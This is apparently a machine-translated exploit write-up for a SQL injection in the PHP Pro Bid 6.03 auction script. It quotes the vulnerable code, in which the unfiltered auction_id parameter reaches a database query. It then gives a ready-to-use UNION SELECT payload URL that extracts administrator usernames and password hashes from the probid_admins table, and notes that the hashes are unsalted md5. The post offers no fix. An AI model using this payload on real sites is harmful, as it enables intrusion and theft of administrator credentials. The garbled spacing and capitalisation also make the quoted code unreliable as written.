PHP Pro Bid 6.03 SQL Injection

Keyword: PHP Pro Bid 6.03

A PHP auction program. The latest version is 6.06. View the Code directly:

Auction_details.php

Code:

$ Template-> set (msg_changes_saved, $ msg_changes_saved );
$ Item_details [quantity] = $ item-> set_quantity ($ item_details [quantity]);
$ Custom_detail-> save_edit_vars ($ item_details [owner_id], $ page_handle );
$ Media_details = $ item-> get_media_values ($ _ REQUEST [auction_id]); // No Filtering
$ Item_details [ad_image] = $ media_details [ad_image];
$ Item_details [ad_video] = $ media_details [ad_video];
$ Template-> set (item_details, $ item_details );
$ Template-> set (buyout_only, $ item-> buyout_only ($ item_details ));

Except des/class_item.php code: Function get_media_values ($ auction_id, $ wanted_ad = false)
{
$ Output = array (auction_id => $ auction_id, ad_image => null, ad_video => null );
(Int) $ counter_image = 0;
(Int) $ counter_video = 0;
$ Field_type = ($ wanted_ad )? Wanted_ad_id: auction_id;
// This is where we want to inject the image. Because the ECHO is an image, media_type must be 1
$ SQL _select_media = $ this-> query ("SELECT media_url, media_type FROM ". DB_PREFIX. "auction_media WHERE ". $ field_type. "= ". $ auction_id. "AND upload_in_progress = 0 order by media_id ASC ");
While ($ media_details = $ this-> fetch_array ($ SQL _select_media ))
{
If ($ media_details [media_type] = 1) // 1 is the image
{
$ Output [ad_image] [$ counter_image ++] = $ media_details [media_url];
}
Else if ($ media_details [media_type] = 2) // video
{
$ Output [ad_video] [$ counter_video ++] = $ media_details [media_url];
}
}
Return $ output;
}Usage:
Auction_details.php? Name = Item name & auction_id = item ID and 1 = 2 union select concat (username, 0x3a, password, 0x3a), 1 from probid_admins --

The Image is broken path contains the Administrator account and password.
In this system, the administrator password is only encrypted with md5, but the Member password is encrypted with md5 ($ password). $ salt ).